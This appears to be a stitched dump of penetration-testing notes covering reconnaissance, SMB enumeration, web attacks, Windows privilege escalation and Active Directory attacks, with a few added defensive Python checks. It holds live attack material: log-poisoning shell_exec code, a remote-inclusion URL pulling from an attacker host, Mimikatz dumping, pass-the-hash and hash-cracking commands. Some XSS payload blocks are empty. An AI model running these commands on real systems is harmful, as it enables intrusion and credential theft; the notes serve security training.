* `vp` (Vulnerable plugins)
* `ap` (All plugins)
* `p` (Popular plugins)
* `vt` (Vulnerable themes)
* `at` (All themes)
* `t` (Popular themes)
* `tt` (Timthumbs)
* `cb` (Config backups)
* `dbe` (Db exports)
* `u` (User IDs range, e.g. u1-5)
* `m` (Media IDs range, e.g. m1-15)

--------------------------------------------------------------------------------
/4.-exploitation/public-exploits.md:
--------------------------------------------------------------------------------
# Public exploits

### Exploit Sources

#### Online exploit sources

* Exploit Database [https://www.exploit-db.com/](https://www.exploit-db.com/)
* SecurityFocus Exploit Archives [https://bugtraq.securityfocus.com/archive](https://bugtraq.securityfocus.com/archive)
* Packet Storm [https://packetstormsecurity.com/files/tags/exploit/](https://packetstormsecurity.com/files/tags/exploit/)

#### Offline exploit resources

* Searchsploit
* Nmap NSE scripts
* The Browser Exploitation Framework (BeEF)
* Metasploit

### Fixing exploits

When using publicly available exploits it is rare that they will work without at least some minor modifications. Others may require more extensive modifications such as updating the payload.

#### Importing and examining exploits

* Searchsploit includes a mirror function that will copy an exploit into the current working directory: `searchsploit -m 43321`
* Headers such as 'winsock' are hints that C programs were intended for compilation on Windows and require cross-compilation

#### Items that commonly require modification

* Target IP address and port
* Attacking machine IP address and port
* Return address for memory corruption exploits
* Payload (typically generated with msfvenom)

#### Cross compiling exploit code

* mingw-w64 is a popular cross compiler available on Linux
* Install mingw using `sudo apt install mingw-w64`
* After installation, mingw-w64 can be used to compile Windows PE files
* `i686-w64-mingw32-gcc 42341.c -o syncbreeze.exe`

#### Fixing web exploits

There are several additional considerations for modifying web exploits:

* Does the exploit initiate an HTTP or HTTPS connection?
* Does the exploit access a web application through a specific path or route?
* Does the exploit leverage a pre-authentication vulnerability, or are credentials required?
* How are the GET and POST requests crafted to trigger and exploit the vulnerability?
* Does the exploit rely on default application settings that might have been changed at install?
* Will oddities such as self-signed certificates disrupt the exploit?

--------------------------------------------------------------------------------
/1.-reconnaissance-osint/information-gathering.md:
--------------------------------------------------------------------------------
# Information gathering

Information gathering is one of the first steps during an engagement. The goal of information gathering is to increase understanding of the target infrastructure, business practices, and information available via open source. The information gathered during this step is used to inform later stages of the engagement.

The following is a sample checklist for researching a target.

#### Review the target's public facing website and social media accounts

* What does the target do?
* How is the organization structured?
* Take note of contact information for key personnel (leadership/management, IT personnel, etc.)
* Collect phone and fax numbers, email addresses, usernames, position titles, pictures, etc.
* Identify email address structures used by the target.
* Identify internal business practices.
* Pay particular attention to "about" pages, as these often contain names, social media links, and email addresses.

#### Use basic tools to gain additional information about the target's network

* Perform [whois](cewl.md#whois-enumeration) and [DNS](../3.-enumeration/53-dns.md) enumeration to identify target registrar and DNS information
* Use [Netcraft](cewl.md#netcraft) and [Google Dorks](google-hacks.md) to attempt to identify technologies used by the target
* Use [Shodan](cewl.md#shodan) to search for additional internet connected computers and devices
* Use [FOCA](cewl.md#foca) to scrape metadata from the target domain(s)
* Use [SSL server test](https://www.ssllabs.com/ssltest/) to analyze SSL configuration
* Check security headers with [securityheaders.com](https://securityheaders.com)
* Check open job postings for mentions of specific technologies

#### Gather information about target personnel

* Harvest usernames - use tools like [Hunter.io](https://hunter.io/), [phonebook.cz](https://phonebook.cz/), and [theHarvester](cewl.md#theharvester) to search the target domain for usernames, emails, etc.
* Use [social media tools](cewl.md#social-media-tools) to profile identified personnel

#### Check public repositories for additional target information

* GitHub, GitLab, SourceForge, Pastebin

--------------------------------------------------------------------------------
/1.-reconnaissance-osint/google-hacks.md:
--------------------------------------------------------------------------------
# Search Engine OSINT

### Search Engine Operators

Search engine OSINT is a collection of techniques that use search strings and operators to refine search queries. There are numerous useful operators that can be used to search for specific information about a site, domain, or company. These operators differ between search engines; the examples below apply specifically to Google.

* **AND** includes all specified keywords in the query (cyber AND war)
* **OR** searches for the presence of one keyword or another (cyber OR war)
* **" "** searches for a specific pattern of words
* **Site** limits searches to a single domain. `site:Microsoft.com`
* **Filetype** limits searches to a specified file type. `site:Microsoft.com filetype:php`
* You can also exclude specific file types using `site:Microsoft.com -filetype:html`
* **Ext** is useful to identify which programming languages are used on the site. `site:Microsoft.com ext:jsp, ext:cfm, ext:pl`
* **Intext** identifies pages with specific terms in the content of the page `intext:"term to search for"`
* **Intitle** identifies pages with specific titles or content. `site:Microsoft.com intitle:"index of"` or `"parent directory"`
* **Inurl** searches for specific terms in a URL `inurl:"keyword"`
* **Cache** searches Google's cached pages. `cache:Microsoft.com`
* Limit search to a single domain `site:Microsoft.com`
* Filter specific subdomains `site:Microsoft.com -site:www.microsoft.com`
* Filetype: limits search results to a specified file type `site:domain.com -filetype:html`
* Ext: useful for discerning programming languages used `ext:jsp, ext:cfm, ext:pl`
* Intitle: can help identify pages with specific titles or content `intitle:"index of" "parent directory"`

### Important links

* Google hacking database: [https://www.exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database)
* Google - [https://www.google.com/](https://www.google.com/)
* Google Advanced Search - [https://www.google.com/advanced_search](https://www.google.com/advanced_search)
* Google Search Guide - [http://www.googleguide.com/print/adv_op_ref.pdf](http://www.googleguide.com/print/adv_op_ref.pdf)
* Bing - [https://www.bing.com/](https://www.bing.com/)
* Yandex - [https://yandex.com/](https://yandex.com/)
* DuckDuckGo - [https://duckduckgo.com/](https://duckduckgo.com/)
* DuckDuckGo Search Guide - [https://help.duckduckgo.com/duckduckgo-help-pages/results/syntax/](https://help.duckduckgo.com/duckduckgo-help-pages/results/syntax/)
* Baidu - [http://www.baidu.com/](https://www.baidu.com/)

--------------------------------------------------------------------------------
/4.-exploitation/web-application-attacks/file-inclusion.md:
--------------------------------------------------------------------------------
# File inclusion

File inclusion vulnerabilities allow an attacker to include a file into the application's running code. Local file inclusions occur when a file is loaded from the web server hosting the application, whereas remote file inclusions load a file from an external source. These vulnerabilities are most commonly found in PHP applications.
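The hardened counterpart to the include parameter this page works through, as an added example that is not part of the original notes: a resolver for a `file`-style parameter that rejects the `../` traversal, `%00` truncation and `data:`/`http:` wrapper inputs described in the sections below, and only ever includes an allowlisted template under one directory. The notes discuss PHP's behaviour; Python is used here only so the check runs stand-alone, and the `TEMPLATE_DIR` path and `ALLOWED_TEMPLATES` names are constructed for the example.

```python
"""Resolve a user-supplied 'file' parameter safely.

Added example, not code from the original notes. Each check corresponds to
one way an include parameter is abused: %00 truncation on old PHP, ../
traversal, and stream wrappers or URLs (data:, php:, http://). The web root
and template names below are constructed for the example.
"""
import os
import urllib.parse

# Constructed: the only templates the application is allowed to include.
ALLOWED_TEMPLATES = {"menu", "about", "contact"}
# Hypothetical web root for the example.
TEMPLATE_DIR = os.path.realpath("/var/www/html/templates")


class IncludeRejected(ValueError):
    """Raised with a short reason when the parameter is not a plain template name."""


def resolve_include(param, base_dir=TEMPLATE_DIR, allowed=ALLOWED_TEMPLATES):
    """Map the raw 'file' query value to an absolute path inside base_dir.

    Order matters: decode first so encoded tricks (%00, %2e%2e) are judged on
    what the application would actually see; reject anything that is not a
    bare allowlisted name; then confirm the resolved path is still under
    base_dir, which also defends against symlinks in the template directory.
    """
    decoded = urllib.parse.unquote(param)
    if "\x00" in decoded:
        raise IncludeRejected("null byte")
    if "://" in decoded or decoded.lower().startswith(("data:", "php:", "file:")):
        raise IncludeRejected("stream wrapper or URL")
    if "/" in decoded or "\\" in decoded or ".." in decoded:
        raise IncludeRejected("path separator or traversal")
    if decoded not in allowed:
        raise IncludeRejected("not an allowlisted template")
    path = os.path.realpath(os.path.join(base_dir, decoded + ".php"))
    if os.path.commonpath([path, base_dir]) != base_dir:
        raise IncludeRejected("resolved outside template directory")
    return path


def classify(param):
    """Return 'allowed' or the rejection reason, for running a list of probes."""
    try:
        resolve_include(param)
        return "allowed"
    except IncludeRejected as exc:
        return str(exc)


if __name__ == "__main__":
    # Probes taken from this page plus two encoded variants (constructed).
    for probe in ["menu", "/../../../Windows/win.ini", "..%2F..%2Fetc%2Fpasswd",
                  "c:\\xampp\\apache\\logs\\access.log", "http://attackerip/evil.txt",
                  "data:text/plain, hello world", "menu%00", "secret"]:
        print(f"{probe!r:45} -> {classify(probe)}")
```

The allowlist does the real work; the earlier checks exist only to give a precise reason in logs, which is what makes probing attempts visible to whoever reviews them. A blocklist of `../` alone would miss the wrapper forms.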
4 | 5 | #### Detection 6 | 7 | File inclusions are identified in the same way as directory traversals--by identifying parameters and attempting to manipulate them. If we locate URLs that include parameters, we should test for both vulnerabilities. 8 | 9 | * Look for any instances where a web application retrieves files and includes contents from the file in the reponse (templates, documents/images/framed content) 10 | * For LFI we attempt to access system files `/../../../Windows/win.ini` 11 | * If successful, we can attempt to read files already stored on the server. 12 | * Impact ranges from disclosure to remote code execution 13 | 14 | {% hint style="info" %} 15 | In PHP versions below 5.3, terminate the request with a null byte "(%00)" 16 | {% endhint %} 17 | 18 | #### Contaminating log files 19 | 20 | Use netcat to connect to the target machine on port 80, then send the following command: 21 | 22 | ``` 23 | ' . shell_exec($_GET[‘cmd’]) . '';?> 24 | ``` 25 | 26 | Although we receive a "Bad Request" in netcat, the command is stored in the server's logs. Once logged, we can attempt command execution. 27 | 28 | ``` 29 | http://10.34.5.34/index.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig 30 | ``` 31 | 32 | If successful, the successful ipconfig output will be returned 33 | 34 | #### Remote File Inclusion 35 | 36 | RFIs are less common than LFIs due to typical default server configuration restrictions. 37 | 38 | ``` 39 | http://10.34.5.34/index.php?file=http://attackerip/evil.txt 40 | ``` 41 | 42 | If successful, we can modify evil.txt with PHP similar to used in the log file example to gain remote code execution. 43 | 44 | #### PHP wrappers 45 | 46 | PhP provides several data wrappers that can be used to exploit directory traversal and LFI vulnerabilities. The data wrappers allows us to embed inline data into the URL in plaintext or Base64. 
**This can be used as an alterative when we cannot poison a local file with PHP code.** 47 | 48 | * The wrapper begins with "data:", followed by the type of data "text/plain,". The contents of the data begin after the comma. 49 | * Test: `http://ipaddress/menu.php?file=data:text/plain, hello world` 50 | * If the test succeeds, we can attempt to use php to execute commands 51 | * `http://ipaddress/menu.php?file=data:text/plain,` 52 | 53 | ### 54 | -------------------------------------------------------------------------------- /3.-enumeration/139-445-netbios-smb.md: -------------------------------------------------------------------------------- 1 | # 139/445 - NetBIOS/SMB 2 | 3 | ### NetBIOS/Server Message Block 4 | 5 | NetBIOS listens on TCP 139 and several UDP ports. SMB (TCP 445) and NetBIOS are separate protocols; however, modern implementations of SMB often utilize NetBIOS over TCP for backwards compatibility. SMB has a history of vulnerabilities but we are primarily interested in SMB for enumeration of shares to search for credentials, backups and other information that may help us gain a foothold. 
6 | 7 | We can search for NetBios/SMB hosts using nmap or nbtscan: 8 | 9 | ``` 10 | nmap -v -p 139,445 10.11.1.1-254 11 | sudo nbtscan -r 10.11.1.0/24 12 | ``` 13 | 14 | #### NSE scripts 15 | 16 | * Viewable with `ls -l /usr/share/nmap/scripts/smb*` 17 | 18 | ``` 19 | nmap -p 139,445 --script=smb* 10.11.1.75 20 | nmap --script=smb-enum* 10.11.1.227 21 | nmap -p 139,445 --script=smb-enum-users 10.11.1.75 22 | nmap -v -p 139,445 -oG smb.txt 10.11.1.1-245 –open 23 | nmap --script smb-vuln-* 10.10.10.40 24 | nmap -p 139,445 --script=smb-os-discovery 10.10.10.40 25 | ``` 26 | 27 | #### CrackMapExec 28 | 29 | ``` 30 | crackmapexec smb $ip_range -u '' -p '' (enumerate null shares) 31 | crackmapexec smb $ip_range --pass-pol 32 | crackmapexec smb $ip_range --users 33 | crackmapexec smb $ip_range --groups 34 | crackmapexec smb $ip_range -u user -p 'password' -d domain --shares 35 | crackmapexec smb $ip_address -u user -p 'password' -d domain --shares --spider "C$" --pattern "pass" 36 | ``` 37 | 38 | ### smbclient 39 | 40 | ``` 41 | smbclient -L \\$ip\\ -U [[domain\\]username] 42 | smbclient -L \\\\$ip\\ 43 | smbclient -L \\\\$ip\\$share 44 | 45 | *connect to share* 46 | smbclient \\\\$ip\\$share 47 | smbclient \\\\$ip\\$share -U domain\\username 48 | ``` 49 | 50 | ### enum4linux 51 | 52 | ``` 53 | enum4linux 10.11.1.127 54 | enum4linux -a -v 10.11.1.227 55 | ``` 56 | 57 | ### showmount 58 | 59 | ``` 60 | showmount -a $targetip (all) 61 | showmount -e $targetip (exports) 62 | ``` 63 | 64 | ### mount 65 | 66 | ``` 67 | mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share 68 | ``` 69 | 70 | ### Download shares 71 | 72 | ``` 73 | get log.txt --allows you to download single files 74 | smbget -R smb://ipaddress/sharename 75 | ``` 76 | 77 | ### smbclient.py 78 | 79 | ``` 80 | python3 /opt/impacket/examples/smbclient.py username@target-ip 81 | python3 /opt/impacket/examples/smbclient.py 'username'@target-ip 82 | python3 /opt/impacket/examples/smbclient.py 
''@target-ip 83 | ``` 84 | 85 | ### Eternal Blue 86 | 87 | * Metasploit module available, search MS17-010 in MSFconsole 88 | * Manual - [https://github.com/3ndG4me/AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) 89 | * Link includes a python script to check for vulnerability **eternal\_checker.py** 90 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [Welcome](README.md) 4 | * [Source Zero Con References](source-zero-con-references.md) 5 | 6 | ## 1. Reconnaissance/ OSINT 7 | 8 | * [Information gathering](1.-reconnaissance-osint/information-gathering.md) 9 | * [OSINT tools](1.-reconnaissance-osint/cewl.md) 10 | * [Search Engine OSINT](1.-reconnaissance-osint/google-hacks.md) 11 | * [Sock puppets](1.-reconnaissance-osint/sock-puppets.md) 12 | 13 | ## 2. Scanning 14 | 15 | * [Host discovery](2.-scanning/host-discovery.md) 16 | * [Port Scanning with Nmap](2.-scanning/port-scanning-with-nmap.md) 17 | * [Nmap Scripting Engine](2.-scanning/nmap-scripting-engine.md) 18 | 19 | ## 3. Enumeration 20 | 21 | * [21 - FTP](3.-enumeration/21-ftp.md) 22 | * [22 - SSH](3.-enumeration/22-ssh.md) 23 | * [25 - SMTP](3.-enumeration/25-smtp.md) 24 | * [53 - DNS](3.-enumeration/53-dns.md) 25 | * [80/443 - HTTP(s)](3.-enumeration/80-443-http-s.md) 26 | * [111 - NFS](3.-enumeration/111-nfs.md) 27 | * [135 - RPC](3.-enumeration/135-rpc.md) 28 | * [139/445 - NetBIOS/SMB](3.-enumeration/139-445-netbios-smb.md) 29 | * [161 (UDP) - SNMP](3.-enumeration/161-udp-snmp.md) 30 | * [Wordpress](3.-enumeration/wordpress.md) 31 | * [Finger (Solaris)](3.-enumeration/finger-solaris.md) 32 | * [Active Directory](3.-enumeration/active-directory.md) 33 | 34 | ## 4. 
Exploitation

* [Public exploits](4.-exploitation/public-exploits.md)
* [Web application attacks](4.-exploitation/web-application-attacks/README.md)
  * [Command injection](4.-exploitation/web-application-attacks/command-injection.md)
  * [Cross site scripting](4.-exploitation/web-application-attacks/cross-site-scripting.md)
  * [Directory traversal](4.-exploitation/web-application-attacks/directory-traversal.md)
  * [File inclusion](4.-exploitation/web-application-attacks/file-inclusion.md)
  * [SQL injection](4.-exploitation/web-application-attacks/sql-injection.md)
* [Password attacks](4.-exploitation/password-attacks.md)
* [Buffer overflows](4.-exploitation/buffer-overflows.md)
* [Active Directory](4.-exploitation/active-directory.md)
* [Metasploit](4.-exploitation/metasploit.md)

## 5. Maintaining access

* [Upgrading simple shells](5.-maintaining-access/shells.md)
* [Reverse shells](5.-maintaining-access/shells-1.md)
* [MSFvenom](5.-maintaining-access/msfvenom.md)
* [File transfers](5.-maintaining-access/file-transfers.md)
* [Linux privilege escalation](5.-maintaining-access/linux-privilege-escalation.md)
* [Windows privilege escalation](5.-maintaining-access/windows-privilege-escalation.md)
* [Tunneling/Port Forwarding](5.-maintaining-access/tunneling.md)

## 6. Miscellaneous

* [Connections](6.-miscellaneous/connections.md)

## 7. Walkthroughs

* [HTB - Blunder](7.-walkthroughs/htb-blunder.md)
* [HTB - Haircut](7.-walkthroughs/htb-haircut.md)
* [THM - HackPark](7.-walkthroughs/thm-hackpark.md)

--------------------------------------------------------------------------------
/4.-exploitation/web-application-attacks/cross-site-scripting.md:

# Cross site scripting

Well-designed web pages typically sanitize user inputs to remove dangerous characters or strings. Cross site scripting (XSS) occurs when data is not sanitized and attackers are able to inject inputs that are subsequently displayed on the web page.

There are three variants of cross-site scripting:

* Stored - occurs when the injected payload is stored on the server. The payload is subsequently displayed to anyone who visits the page.
  * Affects all users of the site
  * Often found in forum software, especially in comments sections or product reviews
* Reflected - occurs when injected payloads are placed into the page content through a form or link. Reflected XSS only affects the person performing the action.
  * Only attacks the person submitting the request or viewing the link
  * Often occurs in search fields and results, as well as anywhere user input is included in error messages
* DOM-based - takes place solely in a page's Document Object Model (DOM).
  * Occurs when a page's DOM is modified with user-controlled content

All three variants can result in session hijacking, redirects and script execution.

#### Detecting

Detection is accomplished by reviewing web pages for input fields and testing to determine whether those fields accept unsanitized input. Commonly sanitized characters (useful for testing) include:

```
< > ' " { } ;
```

If the application does not remove these characters, it may be vulnerable to XSS.

#### Basic example

* We discover a web page that includes a form for users to provide feedback
* Posting a test message of `hello " ; <>` results in no filtering of the input
* We then use a basic payload like "``"
* After submitting, we receive a popup
* Because this user feedback is written to a database, this is a stored XSS vulnerability and all users that visit the page will receive the popup

#### **Injecting content**

A more malicious version of this attack injects invisible iframes into a victim's browser.

```

```

When the victim visits the infected page, their browser attempts to download the linked item and establishes a connection with the attacking machine (requires a netcat listener on port 80).

#### **Stealing cookies and session information**

Cross site scripting can also be used to steal cookies and session information from site visitors.

```

```

When a victim visits the page, their browser establishes a connection back to the attacking machine with an authenticated session id (listener required).

Once we have the session id, we can set it in our browser using a tool like Cookie-Editor and browse to the page without providing credentials (assuming the cookie we captured was for an authenticated user).
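The sanitisation check from the Detecting section and the output-encoding fix for the feedback form, as an added Python example (not code from the original notes). The page template, the `zq1` marker and the helper names are assumptions made for the example.

```python
import html

# Characters the notes list as commonly sanitised: if any of them comes back
# unencoded inside the reflection, the field is a candidate for XSS.
PROBE_CHARS = "<>'\"{};"
# The subset that lets input break out of an HTML text node or attribute.
HTML_BREAKOUT_CHARS = "<>'\""

# Constructed stand-in for the feedback page described in the notes.
FEEDBACK_TEMPLATE = "<html><body><h1>Feedback</h1><p>{message}</p></body></html>"


def render_feedback_vulnerable(message):
    """The bug: user input is concatenated into the HTML without encoding."""
    return FEEDBACK_TEMPLATE.format(message=message)


def render_feedback_fixed(message):
    """The fix: output encoding. html.escape(quote=True) turns & < > " and '
    into entities, so the input can no longer open a tag or an attribute."""
    return FEEDBACK_TEMPLATE.format(message=html.escape(message, quote=True))


def surviving_probe_chars(page, probe, marker):
    """Model of the manual check: locate the reflection of `probe` (which starts
    with the unique `marker`) inside its <p> element and report which of the
    special characters came back verbatim. Returns [] if nothing was reflected."""
    start = page.find(marker)
    if start == -1:
        return []
    end = page.find("</p>", start)
    window = page[start:end if end != -1 else None]
    return [c for c in PROBE_CHARS if c in probe and c in window]


def breakout_possible(surviving):
    """True when a tag or attribute delimiter survived: the page echoes raw HTML.
    A lone ';' surviving is harmless in HTML text, which is why the fixed page
    can still return it."""
    return any(c in HTML_BREAKOUT_CHARS for c in surviving)


if __name__ == "__main__":
    probe = 'zq1 " ; <>'  # the notes' test string, prefixed with a unique marker
    for name, render in (("vulnerable", render_feedback_vulnerable),
                         ("fixed", render_feedback_fixed)):
        survived = surviving_probe_chars(render(probe), probe, "zq1")
        print(f"{name}: survived={survived} breakout={breakout_possible(survived)}")
```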
--------------------------------------------------------------------------------
/5.-maintaining-access/windows-privilege-escalation.md:

# Windows privilege escalation

## Manual enumeration

### User

```
whoami
net user username
```

### Other Users

```
net user
```

### Privileges

```
whoami /priv
```

### Hostname

```
hostname
```

### OS and architecture

```
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```

### Processes and services

```
tasklist /SVC
```

### Network

```
ipconfig /all (interfaces)
route print (routing table)
netstat -ano (active connections)
arp -a
```

### Firewall/AV status

```
sc query windefend
sc query type=service
netsh
netsh advfirewall firewall show rule name=all
netsh advfirewall dump
netsh firewall show state
netsh advfirewall show currentprofile
```

### Applications/patch levels/drivers/kernel modules

```
wmic product get name
wmic product get version
wmic product get vendor
wmic product get name, version, vendor
wmic qfe
wmic qfe get Caption, Description, HotFixID, InstalledOn
(PS) driverquery.exe /v /fo csv | ConvertFrom-Csv | Select-Object 'Display Name', 'Start Mode', Path
(PS) Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DeviceVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMWare*"}
```

### Readable/writeable directories

```
accesschk.exe -uws "Everyone" "C:\Program Files" (SysInternalsSuite)
(PS) Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
```

### Mounted/unmounted disks

```
mountvol
wmic logicaldisk
list drives
```

### Passwords

```
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
```

### Scheduled tasks

```
schtasks /query /FO LIST /v
```

### Binaries that auto elevate

```
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
```

## Automated tools

```
winPEAS.exe
PowerUp.ps1
windows-exploit-suggester.py
Metasploit - post/multi/recon/local_exploit_suggester
```

### windows-exploit-suggester.py

* Run `systeminfo` and save the output into a text document
* Update the database: `./windows-exploit-suggester.py --update`
* Run the check: `./windows-exploit-suggester.py --database DBNameHere --systeminfo filepath.txt`

### Metasploit exploit suggester

* Background the session: `background`
* Select the exploit to use
* Set SESSION
* Set LHOST and LPORT
* Run

--------------------------------------------------------------------------------
/1.-reconnaissance-osint/cewl.md:

# OSINT tools

### CeWL

* Ruby tool that spiders websites and generates wordlists for use in dictionary attacks.
* [https://github.com/digininja/CeWL](https://github.com/digininja/CeWL) (included in Kali)

```
cewl [options]
Example: cewl -m 6 -w megacorp-cewl.txt www.megacorpone.com
-d = depth to spider, default 2
-m = minimum word length, default 3
-w = write the output to file, include file name
-c = count, show word count for each word entry
-v = verbose
```

### FOCA

* Metadata search tool that can search, download and analyze all documents on a domain and provide a list of metadata
* Metadata often includes users, directories, printers, emails, passwords, operating systems/software and servers
* [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA)

### Hunter

* From the site: "Hunter lets you find professional email addresses in seconds and connect with the people that matter for your business."
* [https://hunter.io/](https://hunter.io/)

### Netcraft

* Provides various functions including DNS information and technologies being used on a site.
* [https://www.netcraft.com/tools/#internet-research](https://www.netcraft.com/tools/#internet-research)

### OSINT framework

* Massive directory of OSINT tools arranged by function
* [https://osintframework.com](https://osintframework.com)

### Phonebook.cz

* Lists all domains, email addresses, and URLs associated with a domain.
* [https://phonebook.cz/](https://phonebook.cz/)

### Recon-ng

* Module-based framework for web information gathering
* Run tool (Kali): `recon-ng`
* Search available modules: `marketplace search $keyword`
* Learn about available modules: `marketplace info $modulename`
* Add a module: `marketplace install $modulename`
* Load module: `modules load $modulename`
* Display required parameters: `info`
* Configure options: `options set $option`
* Execute module: `run`
* Information from each module used is stored in a database
* Exit module: `back`
* Display information: `show`

### Shodan

* Allows searching for computers and IoT devices
* May reveal items that should be in scope but were not included by the client
* Search by client name; devices outside the client's IP range are likely managed by third parties
* [https://www.shodan.io/](https://www.shodan.io/)

### Social media tools

* [Social-Searcher](https://www.social-searcher.com/) - a search engine for social media sites
* [Twofi](https://www.kali.org/tools/twofi/) - scans a user's Twitter feed and generates wordlists
* [linkedin2username](https://github.com/initstring/linkedin2username) - a script for generating username lists based on LinkedIn data

### TheHarvester

* Gathers emails, names, subdomains, IP addresses, and URLs from multiple search engines
* Run with (Kali): `theHarvester -d cisco.com -b google`
* `-d`: specifies the target domain
* `-b`: specifies which data source to search

### whois enumeration

* Regular lookup: `whois somesite.com`
* Reverse lookup: `whois $ipaddress`

--------------------------------------------------------------------------------
/4.-exploitation/active-directory.md:

# Active Directory

When testing Active Directory our goals should be to:

* gain a foothold on a machine on the domain and elevate our privileges
* enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain
* gain access to the domain controller
* persist on the domain (situation dependent)

Assuming that we've already [enumerated](../3.-enumeration/active-directory.md) the domain, we should now be focused on gathering credentials to move laterally within the domain.

### Cached credential retrieval

Once you have local admin privileges on a domain-joined computer you can dump the credentials stored in LSASS and the SAM database.

#### Mimikatz

```
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords (dump lsass)
lsadump::sam (dump sam database)
sekurlsa::tickets (dump tickets stored in memory)
kerberos::list (view cached kerberos tickets for the current user)
```

### Attacks

#### Kerberoasting

If we find interesting service accounts while enumerating we can export the Kerberos 5 etype 23 hash for offline cracking.

```
Extracting SPN hashes
crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt
kerberos::list /export

Crack
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt
```

Alternatively, we can use the **Invoke-Kerberoast.ps1** script to enumerate SPNs, request tickets, and export them in a format ready for cracking.

#### AS-REP Roasting

The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication.

```
Searching for AS-REP Roastable users
crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt
GetNPUsers.py domain/user:pass -dc-ip ipaddress -request -format john -outputfile output.txt

Crack
john --format=krb5asrep output.txt
hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt
```

#### Unconstrained delegation

#### Constrained delegation

#### DCSync

### Lateral movement

Moving laterally within a domain is fairly straightforward once you have credentials.

#### Windows remote management

```
winrs -remote:hostname -u:username -p:password (command)
```

#### PS-Remoting

#### PS-EXEC

```
psexec.py domain/user:password@ipaddress
```

#### SMB-EXEC

```
smbexec.py username:password@ipaddress
```

#### Pass the hash

Pass the hash allows attackers to authenticate to a remote system using an NTLM hash.

{% hint style="info" %}
Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place.
{% endhint %}

```
Passing-the-hash Toolkit
pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd

Mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash

SMBclient
smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress

PS Exec
psexec.py -hashes :NTLMhash administrator@ipaddress
```

#### Overpass the hash

The overpass the hash technique utilizes the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication.
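The two account conditions that the Kerberoasting and AS-REP roasting sections above rely on (an enabled account with an SPN, and an enabled account with Kerberos pre-authentication disabled) can be audited from the directory side. Added Python example, not code from these notes; the LDAP entries are constructed and the helper names are hypothetical.

```python
# userAccountControl flag bits (values from Microsoft's documentation of the attribute).
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Hashcat modes the notes list for the two hash types.
HASHCAT_MODE = {"kerberoast": 13100, "asrep": 18200}

# Constructed directory entries standing in for an LDAP search result over the
# attributes sAMAccountName, userAccountControl and servicePrincipalName.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,   # normal, pw never expires
     "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x400200,     # normal + DONT_REQ_PREAUTH
     "servicePrincipalName": []},
    {"sAMAccountName": "olduser", "userAccountControl": 0x400202,  # same, but disabled
     "servicePrincipalName": []},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,      # disabled by design
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000,      # workstation trust account
     "servicePrincipalName": ["HOST/ws01.corp.local"]},
]


def is_enabled(entry):
    return not entry["userAccountControl"] & ACCOUNTDISABLE


def asrep_roastable(entries):
    """Enabled accounts with 'Do not require Kerberos preauthentication' set:
    the population that --asreproast / GetNPUsers.py request AS-REPs for."""
    return sorted(e["sAMAccountName"] for e in entries
                  if is_enabled(e) and e["userAccountControl"] & DONT_REQ_PREAUTH)


def kerberoastable(entries):
    """Enabled user accounts carrying an SPN: any domain user can request a
    service ticket for them, so their password strength is the only defence.
    Computer accounts (trailing $) are skipped; their passwords are random."""
    return sorted(e["sAMAccountName"] for e in entries
                  if is_enabled(e) and e["servicePrincipalName"]
                  and not e["sAMAccountName"].endswith("$"))


def audit(entries):
    """Findings keyed by account, each paired with the cracking mode from the notes,
    so the defender sees exactly which offline attack the setting exposes."""
    findings = {}
    for name in asrep_roastable(entries):
        findings.setdefault(name, []).append(("asrep", HASHCAT_MODE["asrep"]))
    for name in kerberoastable(entries):
        findings.setdefault(name, []).append(("kerberoast", HASHCAT_MODE["kerberoast"]))
    return findings


if __name__ == "__main__":
    for account, issues in audit(SAMPLE_ENTRIES).items():
        print(account, issues)
```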
#### Pass the ticket

### Persistence

#### Golden tickets

--------------------------------------------------------------------------------
/source-zero-con-references.md:

---
description: Thanks for watching!
---

# Source Zero Con References

### Training

#### Books

Engebretson, Patrick. (2013) The Basics of Hacking and Penetration Testing. Syngress.

OccupyTheWeb. (2019) Linux Basics For Hackers: Getting Started with Networking, Scripting, and Security in Kali. No Starch Press.

Weidman, Georgia. (2014) Penetration Testing: A Hands-On Introduction to Hacking. No Starch Press.

#### Courses

